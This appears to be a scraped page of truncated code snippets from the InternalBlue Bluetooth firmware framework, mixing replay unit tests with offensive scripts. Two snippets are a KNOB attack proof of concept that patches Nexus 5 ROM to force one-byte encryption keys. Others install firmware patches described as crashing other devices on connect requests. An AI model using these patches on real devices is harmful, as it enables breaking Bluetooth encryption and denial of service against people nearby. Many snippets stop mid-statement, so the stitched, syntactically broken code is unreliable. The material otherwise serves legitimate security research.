Exemplo n.º 1
def test_info_conn_7():
    dummy = ConnectionInformation(7, bytearray.fromhex('0023023a1a2e'), 0, True, 0xc,
                                  bytearray.fromhex('e98a5eaaff39ecb5ce4447590dfb73a4'), 16,
                                  bytearray.fromhex('dbea2d9c47bc1aa6afe664ff31591aa6'), -87,
                                  bytearray.fromhex('0a00c821ffff8ffa'), bytearray.fromhex('9bff598701000000'),

    trace = os.path.join(os.path.dirname(os.path.abspath(__file__)),
    args = _parse_argv('')
    args.device = 'adb_replay'
    args.replay = trace

    data_directory = os.path.expanduser('~') + '/.internalblue'

    if not os.path.exists(data_directory):

    from internalblue.socket_hooks import hook, ReplaySocket
    hook(ADBCore, ReplaySocket, filename=args.replay)

    connection_methods = [ADBCore(log_level='info', data_directory=data_directory, replay=True)]

    devices = []  # type: List[DeviceTuple]
    devices = connection_methods[0].device_list()

    device = devices[0]
    reference = device[0]
    reference.interface = device[1]

    information = reference.readConnectionInformation(7)

    nose.tools.assert_dict_equal(vars(information), vars(dummy))

Exemplo n.º 2
def test_info_conn_9():
    dummy = ConnectionInformation(9, bytearray.fromhex('000000000000'), 0, False, 12,
                                  bytearray.fromhex('00000000000000000000000000000000'), 0, b'', -87,
                                  bytearray.fromhex('0000000000000000'), bytearray.fromhex('00'))

    trace = os.path.join(os.path.dirname(os.path.abspath(__file__)),
    args = _parse_argv('')
    args.device = 'adb_replay'
    args.replay = trace

    data_directory = os.path.expanduser('~') + '/.internalblue'

    if not os.path.exists(data_directory):

    from internalblue.socket_hooks import hook, ReplaySocket
    hook(ADBCore, ReplaySocket, filename=args.replay)

    connection_methods = [ADBCore(log_level='info', data_directory=data_directory, replay=True)]

    devices = []  # type: List[DeviceTuple]
    devices = connection_methods[0].device_list()

    device = devices[0]
    reference = device[0]
    reference.interface = device[1]

    information = reference.readConnectionInformation(9)

    nose.tools.assert_dict_equal(vars(information), vars(dummy))

Exemplo n.º 3
    //dummy table entry
    .byte 0x35  //nullsub1+1
    .byte 0xAC 
    .byte 0x00
    .byte 0x00
    .byte 0x10  //length  
    .byte 0x00    
    .byte 0x00
    .byte 0x00


internalblue = ADBCore()
internalblue.interface = internalblue.device_list()[0][
    1]  # just use the first device

# setup sockets
if not internalblue.connect():
    log.critical("No connection to target device.")

progress_log = log.info(
    "installing assembly patches to crash other device on connect requests...")

#progress_log = log.info("Writing ASM snippet for LMP 00 table lookup.")
if not internalblue.writeMem(address=ASM_LOCATION_LMP_00_LOOKUP,
Exemplo n.º 4
# Jiska Classen, Secure Mobile Networking Lab

from pwn import *
from internalblue.adbcore import ADBCore
This is a standalone PoC for the KNOB attack on a Nexus 5.

Original LMP monitor mode was from Dennis Mantz, and was then modified by Daniele Antonioli for KNOB.
For details see https://github.com/francozappa/knob

This PoC is much shorter since it only modifies global variables for key entropy.


internalblue = ADBCore(serial=False)
internalblue.interface = internalblue.device_list()[0][
    1]  # just use the first device

# setup sockets
if not internalblue.connect():
    log.critical("No connection to target device.")

    "Installing patch which ensures that send_LMP_encryptoin_key_size_req is always len=1!"

# modify function lm_SendLmpEncryptKeySizeReq
patch = asm("mov r2, #0x1", vma=0x5AED0)  # connection struct key entropy
internalblue.patchRom(0x5AED0, patch)
Exemplo n.º 5
    add  r0, 10  // buffer starts at 10 with data
    ldr  r1, =0x444e4152 // RAND
    str  r1, [r0]
    add  r0, 4   // advance buffer by 4

    // send hci event
    mov  r0, r4  // back to buffer at offset 0
    bl  0x20F4     // send_hci_event()

    pop   {r0-r4, pc}

internalblue = ADBCore(log_level='info')
internalblue.interface = internalblue.device_list()[0][1]  # just use the first device

# setup sockets
if not internalblue.connect():
    internalblue.logger.critical("No connection to target device.")

internalblue.logger.info("installing assembly patches to crash other device on connect requests...")

# Install the RNG code in RAM
if not internalblue.writeMem(address=ASM_LOCATION_RNG, data=code, progress_log=None):
Exemplo n.º 6
#!/usr/bin/env python3

# Jiska Classen

# Get receive statistics on a Samsung Galaxy S8 for BLE connection events

from builtins import range
from internalblue.adbcore import ADBCore
import internalblue.hci as hci
import internalblue.cli as cli
from internalblue.utils.pwnlib_wrapper import log, asm, u8, u16
internalblue = ADBCore(serial=True)
device_list = internalblue.device_list()
if len(device_list) == 0:
    log.warn("No HCI devices connected!")
internalblue.interface = device_list[0][1] # just use the first device

# _connTaskRxDone has a Patchram position, S8 fixed almost everything in BLE, because
# they had to for Bluetooth 5 compliance.
# The base address is 0x5E324, and this will jump into the Patchram.
# You need to adjust the RX_DONE_HOOK_ADDRESS in the beginning.
#RX_DONE_HOOK_ADDRESS = 0x1344D0  # on S8 with Patchlevel May 1 2019 on stock ROM
#RX_DONE_HOOK_ADDRESS = 0x134500  # on S8 with Lineage OS Nightly from August 30 2019
RX_DONE_HOOK_ADDRESS = 0x134514  # on S8 with Patchlevel September 1 2019 on stock ROM
Exemplo n.º 7
from internalblue.cmds import auto_int

This is a standalone PoC for the KNOB attack on a Nexus 5.

Original LMP monitor mode was from Dennis Mantz, and was then modified by Daniele Antonioli for KNOB.
For details see https://github.com/francozappa/knob

This PoC is much shorter since it only modifies global variables for key entropy.


internalblue = ADBCore(serial=False)  # without custom bluetooth.default.so, change to True
internalblue.interface = internalblue.device_list()[0][1]  # just use the first device

# setup sockets
if not internalblue.connect():
    log.critical("No connection to target device.")

log.info("Installing patch which ensures that send_LMP_encryptoin_key_size_req is always len=1!")

# modify function lm_SendLmpEncryptKeySizeReq
patch = asm("mov r2, #0x1", vma=0x5AED0)  # connection struct key entropy
internalblue.patchRom(0x5AED0, patch)

# modify global variable for own setting
Exemplo n.º 8
    // append buffer with "RAND"
    add  r0, 10  // buffer starts at 10 with data
    ldr  r1, =0x444e4152 // RAND
    str  r1, [r0]
    add  r0, 4   // advance buffer by 4

    // send hci event
    mov  r0, r4  // back to buffer at offset 0
    bl   0xE418  // bthci_event_AttemptToEnqueueEventToTransport

    pop   {r0-r4, pc}

internalblue = ADBCore(log_level='info', serial=True)
internalblue.interface = internalblue.device_list()[0][
    1]  # just use the first device

# setup sockets
if not internalblue.connect():
    internalblue.logger.critical("No connection to target device.")

internalblue.logger.info("installing assembly patches...")

# Install the RNG code in RAM
if not internalblue.writeMem(
        address=ASM_LOCATION_RNG, data=code, progress_log=None):
Exemplo n.º 9
def test_info_queue():
    dummy = [
        QueueElement(0, 2123152, 4, 16, 0, 16, 2123208, 2123272, 2123268,
                     2123268, 0, 0, 2123332, 2141676, 'tran_HCIEvent'),
        QueueElement(1, 2123332, 8, 31, 0, 31, 2123388, 2123636, 2123436,
                     2123436, 0, 0, 2123636, 2123152, 'tran_ACLData'),
        QueueElement(2, 2123636, 4, 3, 0, 3, 2123692, 2123704, 2123692,
                     2123692, 0, 0, 2123704, 2123332, 'tran_SCOData'),
        QueueElement(3, 2123704, 4, 31, 0, 31, 2123760, 2123884, 2123760,
                     2123760, 0, 0, 2123884, 2123636,
        QueueElement(4, 2123884, 4, 20, 0, 20, 2123940, 2124020, 2124000,
                     2124000, 0, 0, 2124020, 2123704, 'tran_DiagData'),
        QueueElement(5, 2124020, 8, 8, 0, 8, 2124076, 2124140, 2124076,
                     2124076, 0, 0, 2124140, 2123884, 'tran_HIDUsbKBEvt'),
        QueueElement(6, 2124140, 8, 6, 0, 6, 2124196, 2124244, 2124196,
                     2124196, 0, 0, 2124244, 2124020, 'tran_HIDUsbMSEvt'),
        QueueElement(7, 2124244, 8, 1, 0, 1, 2100496, 2100504, 2100496,
                     2100496, 0, 0, 2124300, 2124140, 'tran_HIDUsbMSCtrl'),
        QueueElement(8, 2124300, 8, 1, 0, 1, 2100504, 2100512, 2100504,
                     2100504, 0, 0, 2124356, 2124244, 'tran_HIDUsbKBCtrl'),
        QueueElement(9, 2124356, 8, 32, 0, 32, 2124412, 2124668, 2124412,
                     2124412, 0, 0, 2110352, 2124300, 'tran_HidAuxData'),
        QueueElement(10, 2110352, 8, 12, 0, 12, 2192284, 2192380, 2192300,
                     2192300, 0, 0, 2120560, 2124356, 'lm_Cmd'),
        QueueElement(11, 2120560, 4, 8, 0, 8, 2192380, 2192412, 2192400,
                     2192400, 0, 0, 2110408, 2110352, 'hci_HciCommand'),
        QueueElement(12, 2110408, 8, 19, 0, 19, 2192412, 2192564, 2192412,
                     2192412, 0, 0, 2118068, 2120560, 'lm_deferredAction'),
        QueueElement(13, 2118068, 8, 6, 0, 6, 2192564, 2192612, 2192564,
                     2192564, 0, 0, 2141588, 2110408, 'lrmmsm_cmd'),
        QueueElement(14, 2141588, 4, 8, 0, 8, 2141644, 2141676, 2141644,
                     2141644, 0, 0, 2141676, 2118068, 'liteHostEvent'),
        QueueElement(15, 2141676, 4, 16, 0, 16, 2141732, 2141796, 2141732,
                     2141732, 0, 0, 2123152, 2141588, 'litehostRcvdL2capData')

    trace = os.path.join(os.path.dirname(os.path.abspath(__file__)),
    args = _parse_argv('')
    args.device = 'adb_replay'
    args.replay = trace

    data_directory = os.path.expanduser('~') + '/.internalblue'

    if not os.path.exists(data_directory):

    from internalblue.socket_hooks import hook, ReplaySocket
    hook(ADBCore, ReplaySocket, filename=args.replay)

    connection_methods = [
        ADBCore(log_level='info', data_directory=data_directory, replay=True)

    devices = []  # type: List[DeviceTuple]
    devices = connection_methods[0].device_list()

    device = devices[0]
    reference = device[0]
    reference.interface = device[1]

    information = reference.readQueueInformation()

    nose.tools.assert_equal([vars(element) for element in information],
                            [vars(element) for element in dummy])

Exemplo n.º 10
    // append buffer with "RAND"
    add  r0, 10  // buffer starts at 10 with data
    ldr  r1, =0x444e4152 // RAND
    str  r1, [r0]
    add  r0, 4   // advance buffer by 4

    // send hci event
    mov  r0, r4  // back to buffer at offset 0
    bl  0x20F4     // send_hci_event()

    pop   {r0-r4, pc}

internalblue = ADBCore(log_level='debug')
internalblue.interface = internalblue.device_list()[0][
    1]  # just use the first device

# setup sockets
if not internalblue.connect():
    log.critical("No connection to target device.")

progress_log = log.info("installing assembly patches...")

# Install the RNG code in RAM
if not internalblue.writeMem(
        address=ASM_LOCATION_RNG, data=code, progress_log=progress_log):
Exemplo n.º 11
def test_info_heap_old():
    dummy = [{
        'index': 0,
        'buffer_headers': {
            2194080: 0,
            2193828: 2121160,
            2193864: 2194008,
            2193900: 2194044,
            2193936: 2193864,
            2193972: 2121160,
            2194008: 2193900,
            2194044: 2194080
        'capacity': 8,
        'address': 2121160,
        'next': 2121208,
        'memory_size': 288,
        'waitlist_length': 0,
        'buffer_list': 2193828,
        'memory': 2193828,
        'buffer_size': 32,
        'prev': 2157672,
        'list_length': 7,
        'thread_waitlist': 0
    }, {
        'index': 1,
        'buffer_headers': {
            2194592: 0,
            2194116: 2194184,
            2194184: 2194252,
            2194252: 2194320,
            2194320: 2194388,
            2194388: 2194456,
            2194456: 2194524,
            2194524: 2194592
        'capacity': 8,
        'address': 2121208,
        'next': 2121256,
        'memory_size': 544,
        'waitlist_length': 0,
        'buffer_list': 2194184,
        'memory': 2194116,
        'buffer_size': 64,
        'prev': 2121160,
        'list_length': 7,
        'thread_waitlist': 0
    }, {
        'index': 2,
        'buffer_headers': {
            2196000: 2196268,
            2197072: 0,
            2194660: 2194928,
            2195464: 2195732,
            2196268: 2196536,
            2194928: 2195196,
            2195732: 2196000,
            2196536: 2196804,
            2196804: 2197072,
            2195196: 2195464
        'capacity': 10,
        'address': 2121256,
        'next': 2121352,
        'memory_size': 2680,
        'waitlist_length': 0,
        'buffer_list': 2194660,
        'memory': 2194660,
        'buffer_size': 264,
        'prev': 2121208,
        'list_length': 10,
        'thread_waitlist': 0
    }, {
        'index': 3,
        'buffer_headers': {
            2214480: 2215548,
            2215548: 2216616,
            2216616: 0,
            2213412: 2214480
        'capacity': 4,
        'address': 2121352,
        'next': 2121304,
        'memory_size': 4272,
        'waitlist_length': 0,
        'buffer_list': 2213412,
        'memory': 2213412,
        'buffer_size': 1064,
        'prev': 2121256,
        'list_length': 4,
        'thread_waitlist': 0
    }, {
        'index': 4,
        'buffer_headers': {
            2234124: 0,
            2231932: 2233028,
            2224260: 2225356,
            2219876: 2220972,
            2226452: 2227548,
            2223164: 2224260,
            2228644: 2229740,
            2220972: 2222068,
            2225356: 2226452,
            2230836: 2231932,
            2233028: 2234124,
            2222068: 2223164,
            2227548: 2228644,
            2217684: 2218780,
            2218780: 2219876,
            2229740: 2230836
        'capacity': 16,
        'address': 2121304,
        'next': 2157624,
        'memory_size': 17536,
        'waitlist_length': 0,
        'buffer_list': 2217684,
        'memory': 2217684,
        'buffer_size': 1092,
        'prev': 2121352,
        'list_length': 16,
        'thread_waitlist': 0
    }, {
        'index': 5,
        'buffer_headers': {
            2235264: 2235308,
            2235616: 2235660,
            2235396: 2235440,
            2235528: 2235572,
            2235660: 2235704,
            2235308: 2235352,
            2235440: 2235484,
            2235704: 2235748,
            2235792: 2235836,
            2235220: 2235264,
            2235748: 2235792,
            2235352: 2235396,
            2235572: 2235616,
            2235836: 0,
            2235484: 2235528
        'capacity': 15,
        'address': 2157624,
        'next': 2157672,
        'memory_size': 660,
        'waitlist_length': 0,
        'buffer_list': 2235220,
        'memory': 2235220,
        'buffer_size': 40,
        'prev': 2121304,
        'list_length': 15,
        'thread_waitlist': 0
    }, {
        'index': 6,
        'buffer_headers': {
            2236096: 2236132,
            2236240: 2236276,
            2236132: 2236168,
            2236384: 0,
            2235880: 2235916,
            2236204: 2236240,
            2236348: 2236384,
            2235916: 2235952,
            2235952: 2235988,
            2236168: 2236204,
            2236312: 2236348,
            2235988: 2236024,
            2236024: 2236060,
            2236276: 2236312,
            2236060: 2236096
        'capacity': 15,
        'address': 2157672,
        'next': 2121160,
        'memory_size': 540,
        'waitlist_length': 0,
        'buffer_list': 2235880,
        'memory': 2235880,
        'buffer_size': 32,
        'prev': 2157624,
        'list_length': 15,
        'thread_waitlist': 0

    trace = os.path.join(
    args = _parse_argv('')
    args.device = 'adb_replay'
    args.replay = trace

    data_directory = os.path.expanduser('~') + '/.internalblue'

    if not os.path.exists(data_directory):

    from internalblue.socket_hooks import hook, ReplaySocket
    hook(ADBCore, ReplaySocket, filename=args.replay)

    connection_methods = [
        ADBCore(log_level='info', data_directory=data_directory, replay=True)

    devices = []  # type: List[DeviceTuple]
    devices = connection_methods[0].device_list()

    device = devices[0]
    reference = device[0]
    reference.interface = device[1]

    information = reference.readHeapInformation()

    nose.tools.assert_equal(information, dummy)
